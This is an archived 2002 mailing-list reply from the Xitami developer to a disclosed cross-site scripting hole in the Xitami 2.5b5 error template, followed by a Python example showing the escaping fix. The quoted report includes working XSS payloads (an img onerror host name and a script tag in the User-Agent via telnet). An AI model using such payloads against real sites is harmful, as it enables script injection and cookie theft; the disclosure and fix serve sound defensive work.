[Xitami] Re: Errors.gsl Script Injection Vulnerability
Pieter Hintjens
xitami@lists.xitami.org
Mon, 17 Jun 2002 09:44:58 +0200
Matthew,
Thanks for reporting this security hole. Xitami 2.5b5 is a beta and
as such we do not recommend its use for production or public web
sites. The production release of Xitami (2.4d9) does not use GSL and
is not subject to this attack.
You should also note that the supplied script is an example that is
intended to show the available fields, and not hard-coded. The web
site manager can easily remove references to any or all information
coming from the browser. Further, GSL processing for errors is
disabled by default.
However, we're grateful for your work and we will make changes to the
2.5b package to filter all information received from the browser
before showing it in error screens.
I am forwarding this message to the Xitami discussion list, since we
do not believe it serves our users to hide information about such
vulnerabilities.
Best regards,
-
Pieter Hintjens
iMatix Corporation
> There is a security hole in the 'errors.gsl' template that ships
> with Xitami 2.5b5 that may allow an attacker to run scripts
> against visiting users in the security zone of the targeted site; this
> allows for cookie theft, and other malicious actions. My site,
> www.murphy.101main.net runs the Beta:
>
> http://www.<IMG%20SRC=""%20ONERROR="alert%28'CSS'%29">.murphy.101main.net/error404
>
> The "/error404" throws a 404 error and Xitami returns the
> following output:
>
> <HTML><TITLE>Error</TITLE><BODY><H1>
> <HTML><BODY>
> <H2>Error 404</H2>
> <H3>Not found</H3>
> <P>
> <HR>
> <TABLE>
> <TR><TD>Server </TD><TD>Xitami</TD></TR>
> <TR><TD>Version </TD><TD>2.5b5</TD></TR>
> <TR><TD>Name </TD><TD>www.<img src=""
> onerror="alert('css')">.murphy.101main.net</TD></TR>
> <TR><TD>Full URL </TD><TD>http://www.<img src=""
> onerror="alert('css')">.murphy.101main.net/</TD></TR>
> <TR><TD>HTTP port </TD><TD>0</TD></TR>
> <TR><TD>Protocol </TD><TD>HTTP/1.1</TD></TR>
> <TR><TD>Your IP </TD><TD>65.28.45.230</TD></TR>
> <TR><TD>Your browser </TD><TD>Mozilla/4.0 (compatible; MSIE 6.0;
> Windows 98; Win 9x 4.90; .NET CLR 1.0.3705)</TD></TR> </TABLE>
> </BODY></HTML>
>
> As you can see, this results in code injection because a NULL image
> fires the onError event, which displays the message, meaning that JS
> code is executed in the name of the site by the attacker against the
> visiting browser. Also, no filtering is applied on the User-Agent
> that the server accepts for the error. Take for example this Telnet
> session:
>
> telnet localhost 80
> GET /error404 HTTP/1.0
> User-Agent: <SCRIPT>alert("UA Attack");
>
> The HTTP protocol is not vulnerable; this seems to be replaced with
> "HTTP/1.1" when an invalid value is supplied:
>
> telnet localhost 80
> GET /error404 HTTP/<SCRIPT>alert("Protocol Attack");</SCRIPT>
>
> This does nothing.
>
> I have published an alert (no technical details) on my site here:
>
> http://www.murphy.101main.net/vna-xitami.txt
>
> I also plan to submit this alert to BugTraq and SecuriTeam
> immediately. If no reply is received within 7 days, technical details
> will be released to the public.
>
> "The reason the mainstream is thought
> of as a stream is because it is
> so shallow."
> - Author Unknown
>
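The fix Pieter describes above (escape every browser-supplied value before it is written into the error page) is straightforward to show in code. The following is an added example written for this page; it is not Xitami or iMatix code and does not use GSL. It parses a raw HTTP request carrying the two payloads from the report (the <img onerror> in the host name and the <SCRIPT> in the User-Agent), renders the same error table Xitami produced both with and without HTML escaping, and provides a check that lists which untrusted fields reach the page verbatim. The request text and the client IP 192.0.2.1 are constructed for the example.

```python
import html
import re

# Constructed sample request. The payloads are the ones quoted in the report
# above; the client IP used below is made up for this example.
RAW_REQUEST = (
    "GET /error404 HTTP/1.1\r\n"
    "Host: www.<img src=\"\" onerror=\"alert('css')\">.murphy.101main.net\r\n"
    "User-Agent: <SCRIPT>alert(\"UA Attack\");</SCRIPT>\r\n"
    "\r\n"
)

CLIENT_IP = "192.0.2.1"


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, version and headers.

    The report observes that Xitami substitutes HTTP/1.1 for an invalid
    protocol token; that behaviour is mirrored here (assumption, not the
    real server's parser)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    if not re.fullmatch(r"HTTP/\d\.\d", version):
        version = "HTTP/1.1"
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def error_fields(req, client_ip):
    """Collect the fields the error template displays, in the order shown in
    the report. Everything after Server/Version originates from the client
    and must be treated as untrusted."""
    host = req["headers"].get("host", "")
    return [
        ("Server", "Xitami"),
        ("Version", "2.5b5"),
        ("Name", host),
        ("Full URL", "http://%s%s" % (host, req["path"])),
        ("Protocol", req["version"]),
        ("Your IP", client_ip),
        ("Your browser", req["headers"].get("user-agent", "")),
    ]


def render_error_page(req, client_ip, escape_output, status=404, reason="Not found"):
    """Render the error page. escape_output=False reproduces the reported
    behaviour (raw interpolation); escape_output=True HTML-escapes every
    interpolated value, including quotes, so it cannot break out of the
    surrounding <TD> or start an attribute."""
    enc = (lambda s: html.escape(s, quote=True)) if escape_output else (lambda s: s)
    rows = "".join("<TR><TD>%s </TD><TD>%s</TD></TR>\n" % (label, enc(value))
                   for label, value in error_fields(req, client_ip))
    return ("<HTML><TITLE>Error</TITLE><BODY>\n"
            "<H2>Error %d</H2>\n<H3>%s</H3>\n<P>\n<HR>\n<TABLE>\n%s</TABLE>\n"
            "</BODY></HTML>\n" % (status, enc(reason), rows))


def unescaped_client_values(req, client_ip, page):
    """Return the client-supplied values that contain HTML-significant
    characters and still appear verbatim in the rendered page. An empty
    list means the template escaped everything it should have."""
    trusted = {"Server", "Version"}
    return [value for label, value in error_fields(req, client_ip)
            if label not in trusted
            and any(c in value for c in "<>\"'&")
            and value in page]


if __name__ == "__main__":
    req = parse_request(RAW_REQUEST)
    for escaped in (False, True):
        page = render_error_page(req, CLIENT_IP, escape_output=escaped)
        leaks = unescaped_client_values(req, CLIENT_IP, page)
        print("escape_output=%s -> %d field(s) echoed raw: %r" % (escaped, len(leaks), leaks))
```

Run as a script it reports three raw echoes (Name, Full URL, Your browser) for the unescaped rendering and none for the escaped one. Escaping at the point of output is the right layer: removing fields from the template, as Pieter notes a site manager can do, narrows exposure, but any value that is ever displayed still needs the encoding step.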